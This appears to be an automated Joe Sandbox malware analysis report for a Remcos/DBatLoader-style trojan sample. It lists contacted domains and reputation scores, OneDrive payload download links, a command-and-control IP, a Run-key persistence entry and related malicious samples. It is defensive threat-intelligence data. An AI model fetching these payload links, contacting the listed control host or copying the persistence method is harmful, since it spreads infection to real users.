                    C:\Users\Public\Libraries\Jsqwmpul.PIF60%VirustotalBrowse
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    dual-spov-0006.spov-msedge.net0%VirustotalBrowse
                    geoplugin.net3%VirustotalBrowse
                    onedrive.live.com1%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://www.imvu.comr0%URL Reputationsafe
                    http://www.imvu.comr0%URL Reputationsafe
                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
                    https://aefd.nelreports.net/api/report?cat=bingaotak0%URL Reputationsafe
                    https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C100%URL Reputationphishing
                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
                    https://sectigo.com/CPS00%URL Reputationsafe
                    http://geoplugin.net/json.gp100%URL Reputationphishing
                    https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
                    https://aefd.nelreports.net/api/report?cat=bingrms0%URL Reputationsafe
                    http://ocsp.sectigo.com0C0%URL Reputationsafe
                    http://www.ebuddy.com0%URL Reputationsafe
                    https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2ZPGwC0%Avira URL Cloudsafe
                    https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=0%Avira URL Cloudsafe
                    https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P0%Avira URL Cloudsafe
                    107.175.229.1390%Avira URL Cloudsafe
                    https://2hhi9w.am.files.1drv.com/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwrezLWp0%Avira URL Cloudsafe
                    http://www.nirsoft.net0%Avira URL Cloudsafe
                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                    http://www.nirsoft.net1%VirustotalBrowse
                    https://onedrive.live.com/0%Avira URL Cloudsafe
                    https://2hhi9w.am.files.1drv.com/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1Vh_Y0%Avira URL Cloudsafe
                    https://www.google.com0%Avira URL Cloudsafe
                    107.175.229.13917%VirustotalBrowse
                    https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf18270730%Avira URL Cloudsafe
                    https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF0%Avira URL Cloudsafe
                    https://live.com/50%Avira URL Cloudsafe
                    https://onedrive.live.com/1%VirustotalBrowse
                    https://2hhi9w.am.files.1drv.com/gd0%Avira URL Cloudsafe
                    https://maps.windows.com/windows-app-web-link0%Avira URL Cloudsafe
                    https://live.com/0%Avira URL Cloudsafe
                    https://www.google.com0%VirustotalBrowse
                    https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                    http://www.nirsoft.net/0%Avira URL Cloudsafe
                    http://www.imvu.comata0%Avira URL Cloudsafe
                    https://live.com/50%VirustotalBrowse
                    https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF0%VirustotalBrowse
                    https://2hhi9w.am.files.1drv.com/0%Avira URL Cloudsafe
                    https://login.yahoo.com/config/login0%VirustotalBrowse
                    http://geoplugin.net/json.gpY0%Avira URL Cloudsafe
                    https://www.office.com/0%Avira URL Cloudsafe
                    https://maps.windows.com/windows-app-web-link0%VirustotalBrowse
                    http://www.nirsoft.net/1%VirustotalBrowse
                    http://geoplugin.net/json.gph0%Avira URL Cloudsafe
                    https://2hhi9w.am.files.1drv.com:443/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2Z0%Avira URL Cloudsafe
                    https://2hhi9w.am.files.1drv.com/0%VirustotalBrowse
                    https://2hhi9w.am.files.1drv.com/y4mKPtT-rAbG4inW0O2_-07PoRY_sfXHa6qbFlkBszZbmAY1MzHswFDHO6u63PruOhI0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpY0%VirustotalBrowse
                    https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e0%Avira URL Cloudsafe
                    http://www.imvu.com0%Avira URL Cloudsafe
                    https://www.office.com/0%VirustotalBrowse
                    http://geoplugin.net/json.gph0%VirustotalBrowse
                    https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3L0%Avira URL Cloudsafe
                    https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3LL0%Avira URL Cloudsafe
                    https://live.com/0%VirustotalBrowse
                    https://2hhi9w.am.files.1drv.com:443/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwre0%Avira URL Cloudsafe
                    https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                    http://www.pmail.com0%Avira URL Cloudsafe
                    http://www.imvu.com0%VirustotalBrowse
                    https://2hhi9w.am.files.1drv.com:443/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ10%Avira URL Cloudsafe
                    https://onedrive.live.com/downlo0%Avira URL Cloudsafe
                    https://www.google.com/accounts/servicelogin0%VirustotalBrowse
                    https://onedrive.live.com/downlo0%VirustotalBrowse
                    http://www.pmail.com0%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    dual-spov-0006.spov-msedge.net
                    13.107.139.11
                    truetrueunknown
                    geoplugin.net
                    178.237.33.50
                    truefalseunknown
                    onedrive.live.com
                    unknown
                    unknowntrueunknown
                    2hhi9w.am.files.1drv.com
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      107.175.229.139true
                      • 17%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://geoplugin.net/json.gptrue
                      • URL Reputation: phishing
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Pbhv3259.tmp.4.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://2hhi9w.am.files.1drv.com/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwrezLWpHGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.imvu.comrSndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://ocsp.sectigo.com0HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=Jsqwmpul.PIF, 0000000C.00000002.2281075353.000000002C5A0000.00000004.00001000.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2ZPGwCJsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.nirsoft.netSndVol.exe, 00000004.00000002.2047760751.0000000000963000.00000004.00000010.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://2hhi9w.am.files.1drv.com/gdJsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://aefd.nelreports.net/api/report?cat=bingaotakbhv3259.tmp.4.drfalse
                      • URL Reputation: safe
                      unknown
                      https://deff.nelreports.net/api/report?cat=msnbhv3259.tmp.4.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comSndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://onedrive.live.com/HGTQP09643009.scr.exe, 00000000.00000002.2002800587.00000000007B0000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000072F000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.00000000008E7000.00000004.00000020.00020000.00000000.sdmptrue
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://2hhi9w.am.files.1drv.com/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1Vh_YJsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.comSndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073bhv3259.tmp.4.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AFbhv3259.tmp.4.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://live.com/5HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://geoplugin.net/json.gp/CSndVol.exe, 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmptrue
                      • URL Reputation: phishing
                      unknown
                      https://maps.windows.com/windows-app-web-linkbhv3259.tmp.4.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://live.com/Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000905000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://login.yahoo.com/config/loginSndVol.exefalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.nirsoft.net/SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.imvu.comataSndVol.exe, 00000008.00000002.2033248521.000000000322D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://2hhi9w.am.files.1drv.com/HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://geoplugin.net/json.gpYSndVol.exe, 00000003.00000003.2050939936.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2022947923.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408617814.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2299239501.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2051064837.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2017852244.00000000034BE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.office.com/bhv3259.tmp.4.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://geoplugin.net/json.gphSndVol.exe, 00000003.00000003.2019710060.00000000034F9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://2hhi9w.am.files.1drv.com:443/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2ZJsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://sectigo.com/CPS0HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://2hhi9w.am.files.1drv.com/y4mKPtT-rAbG4inW0O2_-07PoRY_sfXHa6qbFlkBszZbmAY1MzHswFDHO6u63PruOhIJsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949ebhv3259.tmp.4.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.imvu.comSndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2033248521.000000000322D000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3LJsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3LLJsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://aefd.nelreports.net/api/report?cat=bingaotbhv3259.tmp.4.drfalse
                      • URL Reputation: safe
                      unknown
                      https://2hhi9w.am.files.1drv.com:443/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwreHGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://aefd.nelreports.net/api/report?cat=bingrmsbhv3259.tmp.4.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.google.com/accounts/serviceloginSndVol.exefalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.pmail.comHGTQP09643009.scr.exe, 00000000.00000002.2033128865.000000007FCE9000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2003278216.00000000022E2000.00000004.00001000.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.sectigo.com0CHGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://2hhi9w.am.files.1drv.com:443/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://onedrive.live.com/downloJsqwmpul.PIF, 0000000C.00000002.2281075353.000000002C5ED000.00000004.00001000.00020000.00000000.sdmptrue
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.ebuddy.comSndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      13.107.139.11
                      dual-spov-0006.spov-msedge.netUnited States
                      8068MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                      107.175.229.139
                      unknownUnited States
                      36352AS-COLOCROSSINGUStrue
                      178.237.33.50
                      geoplugin.netNetherlands
                      8455ATOM86-ASATOM86NLfalse
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1441701
                      Start date and time:2024-05-15 01:56:04 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 10m 36s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:HGTQP09643009.scr.exe
                      Detection:MAL
                      Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/6@3/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 89
                      • Number of non-executed functions: 261
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded IPs from analysis (whitelisted): 13.107.42.12
                      • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-am-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-am-files-brs.onedrive.akadns.net, fe3cr.delivery.mp.microsoft.com
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      TimeTypeDescription
                      01:56:46API Interceptor1x Sleep call for process: HGTQP09643009.scr.exe modified
                      01:56:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Jsqwmpul C:\Users\Public\Jsqwmpul.url
                      01:57:03API Interceptor2x Sleep call for process: Jsqwmpul.PIF modified
                      01:57:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Jsqwmpul C:\Users\Public\Jsqwmpul.url
                      01:57:25API Interceptor6617169x Sleep call for process: SndVol.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      13.107.139.11Customer Ref-340000723012366.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                        PNX-SOA-0452-01073-2024.13.05-04-15-113108087979.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                          Statement of Account March & April.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                            4333.exeGet hashmaliciousDBatLoader, FormBookBrowse
                              remcos.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                https://1drv.ms/u/s!AvRvEmgJ5d9kgly3z-uh2_ANgH5hGet hashmaliciousUnknownBrowse
                                  https://1drv.ms/u/s!AvRvEmgJ5d9kgly3z-uh2_ANgH5hGet hashmaliciousUnknownBrowse
                                    htm.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                      y0w04xGM45.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                        Se7CZnlXZZ.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                          107.175.229.139z49factura098765679000.bat.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                            #U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                              z97FDREMCO00000HJ.bat.exeGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                VNNctWOjel.exeGet hashmaliciousRemcosBrowse
                                                  0876543456700076.xlam.xlsxGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    uBsTFchGsf.exeGet hashmaliciousRemcosBrowse
                                                      Orden de compra 0001-0025545T.exeGet hashmaliciousRemcosBrowse
                                                        SDA09876789000090.exeGet hashmaliciousRemcosBrowse
                                                          FTQ07789000900.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            Orden de compra 0001-00255454.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                              178.237.33.50Shipping Document.P.df.exeGet hashmaliciousPrivateLoader, RemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              RFQ_83747384738757384754837483.xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              FOTO MULTA NACIONAL.vbsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              Customer Ref-340000723012366.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              PNX-SOA-0452-01073-2024.13.05-04-15-113108087979.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              BenefitsRequest#241305.com.exeGet hashmaliciousRemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              0093222024135.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              2024_002930_24270100IM00003824_onyuz.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                              • geoplugin.net/json.gp
                                                              remcos.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              remcos.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • geoplugin.net/json.gp
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              dual-spov-0006.spov-msedge.netCustomer Ref-340000723012366.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 13.107.139.11
                                                              PNX-SOA-0452-01073-2024.13.05-04-15-113108087979.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 13.107.139.11
                                                              Statement of Account March & April.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 13.107.139.11
                                                              4333.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                              • 13.107.139.11
                                                              RFQ(PO1,2AN3)002088UTH-PDF.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                              • 13.107.137.11
                                                              remcos.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 13.107.139.11
                                                              remcos.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 13.107.137.11
                                                              remcos.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 13.107.137.11
                                                              Purchase Order.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                              • 13.107.137.11
                                                              Purchase Order is approved20240509.cmdGet hashmaliciousDBatLoaderBrowse
                                                              • 13.107.137.11
                                                              geoplugin.netShipping Document.P.df.exeGet hashmaliciousPrivateLoader, RemcosBrowse
                                                              • 178.237.33.50
                                                              RFQ_83747384738757384754837483.xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              FOTO MULTA NACIONAL.vbsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              Customer Ref-340000723012366.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              PNX-SOA-0452-01073-2024.13.05-04-15-113108087979.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              BenefitsRequest#241305.com.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              0093222024135.exeGet hashmaliciousRemcos, GuLoaderBrowse
